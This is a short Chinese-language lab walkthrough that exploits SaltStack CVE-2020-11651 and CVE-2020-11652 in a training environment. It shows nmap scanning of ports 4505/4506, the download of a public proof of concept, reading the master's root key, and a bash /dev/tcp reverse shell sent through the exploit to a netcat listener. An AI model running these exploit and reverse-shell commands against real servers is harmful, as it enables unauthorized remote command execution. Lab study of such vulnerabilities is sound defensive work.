实验环境:http://www.hetianlab.com/expc.do?ce=13cbbaf6-2037-4925-ba09-6c97bd1f6a3b

先获取ip地址网段

再扫描一下本网段

SaltStack应用默认绑定的端口是4505,4506

那就直接nmap扫描这两个端口

确实是打开的

接下来,就是对端口进行漏洞检测

先获取工具,解压

1
2
wget http://tools.hetianlab.com/tools/CVE-2020-11651.zip
unzip CVE-2020-11651.zip

或者直接

1
git clone https://github.com/jasperla/CVE-2020-11651-poc.git

利用exploit检测

python3 exploit.py --master 10.1.1.137

成功读取到了“root key”,说明存在漏洞。

在CVE-2020-11652目录遍历漏洞中,攻击者通过构造恶意请求,读取服务器上任意文件。比如/etc/passwd

再或者

CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

先反弹一个shell回来,在kali上监听一个端口

nc -lvvp 1234

执行脚本

python3 exploit.py –master 10.1.1.137 –exec ‘bash -i >& /dev/tcp/10.1.1.135/1234 0>&1’

1
ifconfig

ok